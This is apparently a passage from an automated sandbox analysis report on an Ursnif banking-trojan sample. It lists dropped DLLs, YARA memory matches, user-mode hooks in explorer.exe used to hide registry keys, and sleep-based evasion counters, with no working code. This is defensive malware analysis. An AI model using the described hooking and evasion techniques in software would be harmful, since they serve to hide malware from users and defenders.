          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_030E08B7 push dword ptr [ebp-00000284h]; ret 3_2_030E0A65
          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_030E08B7 push dword ptr [ebp-0000028Ch]; ret 3_2_030E0AB9
          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_030E08B7 push edx; ret 3_2_030E0B11
          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_030E08B7 push dword ptr [esp+10h]; ret 3_2_030E0BFB
          Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_010449B3 RegOpenKeyA,LoadLibraryA,GetProcAddress,GetLastError,FreeLibrary,GetLastError,RegCloseKey,0_2_010449B3
          Source: jtmpm3o0.dll.35.dr | Static PE information: real checksum: 0x0 should be: 0x661a
          Source: hupbkl0t.dll.41.dr | Static PE information: real checksum: 0x0 should be: 0x8132
          Source: wnczrnms.dll.46.dr | Static PE information: real checksum: 0x0 should be: 0x9e33
          Source: kon0vos3.dll.38.dr | Static PE information: real checksum: 0x0 should be: 0x7727
          Source: 61b85f75e6a7c.dll | Static PE information: real checksum: 0x1ba6ec should be: 0x1c2401
          Source: gmpgobli.dll.48.dr | Static PE information: real checksum: 0x0 should be: 0x2130
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\wnczrnms\wnczrnms.dllJump to dropped file
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\gmpgobli\gmpgobli.dllJump to dropped file
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\jtmpm3o0\jtmpm3o0.dllJump to dropped file
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\hupbkl0t\hupbkl0t.dllJump to dropped file
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\kon0vos3\kon0vos3.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          Yara detected Ursnif
          Source: Yara match File source: 00000004.00000003.516477194.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000003.472386293.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: 00000003.00000003.519108386.000000000559D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: 0000002B.00000003.654015675.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: 0000002A.00000003.665205397.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000003.518961591.000000000533D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000003.664429538.000000000533D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: 0000002D.00000003.646797077.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: 0000002D.00000002.672804505.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000003.571761506.0000000005A68000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: 00000003.00000003.517518068.000000000559D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000003.520102514.000000000385D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000003.470175062.0000000004F58000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: 00000003.00000003.471268308.0000000005818000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000003.571873889.0000000006198000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000003.520620067.000000000385D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: 0000002B.00000003.654119494.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000003.517906088.000000000385D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000003.494184695.000000000543B000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: 0000002D.00000003.656058284.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000003.470929059.00000000055B8000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: 00000003.00000003.519944178.000000000559D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: 0000002B.00000003.654247659.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: 0000002B.00000002.675606081.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: 0000002A.00000003.665814444.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000003.573864937.0000000004B38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: 0000002A.00000002.678328822.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: 0000002B.00000003.668236157.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: 0000002A.00000003.665936596.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: 0000002D.00000003.647071463.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: 0000002A.00000003.671175308.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000003.493926850.0000000004DDB000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: 0000002B.00000003.654303874.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: 0000002D.00000003.647295334.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: 0000002D.00000003.655646861.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000003.617274009.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: 0000002A.00000003.665894712.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: 0000002D.00000003.647415527.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: 0000002A.00000003.671422400.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000003.495487329.000000000395B000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: 00000003.00000003.574142026.00000000064F8000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000003.518696418.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: 00000003.00000003.494405815.000000000569B000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000003.518133566.000000000533D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000003.517688433.000000000533D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: 00000003.00000003.654830894.000000000559D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000003.517563234.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000003.647561301.000000000385D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: 0000002B.00000003.668321842.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 6132, type: MEMORYSTR
          Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 7016, type: MEMORYSTR
          Source: Yara match File source: Process Memory Space: rundll32.exe PID: 7056, type: MEMORYSTR
          Source: Yara match File source: Process Memory Space: rundll32.exe PID: 7084, type: MEMORYSTR
          Source: Yara match File source: Process Memory Space: control.exe PID: 5832, type: MEMORYSTR
          Source: Yara match File source: Process Memory Space: control.exe PID: 5952, type: MEMORYSTR
          Hooks registry keys query functions (used to hide registry keys)
          Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
          Modifies the export address table of user mode modules (user mode EAT hooks)
          Source: explorer.exe IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFD8893521C
          Modifies the import address table of user mode modules (user mode IAT hooks)
          Source: explorer.exe EAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFD88935200
          Source: C:\Windows\System32\loaddll32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
          Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\control.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2728 | Thread sleep count: 31 > 30
          Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2516 | Thread sleep count: 2687 > 30
          Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2516 | Thread sleep count: 1542 > 30
          Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2516 | Thread sleep time: -592128s >= -30000s
          Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2516 | Thread sleep count: 1728 > 30
          Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2516 | Thread sleep time: -82944s >= -30000s
          Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2516 | Thread sleep count: 588 > 30
          Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2516 | Thread sleep time: -56448s >= -30000s
          Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2516 | Thread sleep count: 1716 > 30
          Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2516 | Thread sleep time: -41184s >= -30000s
          Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2516 | Thread sleep count: 1395 > 30
          Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2516 | Thread sleep time: -267840s >= -30000s
          Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2516 | Thread sleep count: 174 > 30
          Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2516 | Thread sleep count: 44 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6440 | Thread sleep count: 5010 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5876 | Thread sleep count: 861 > 30
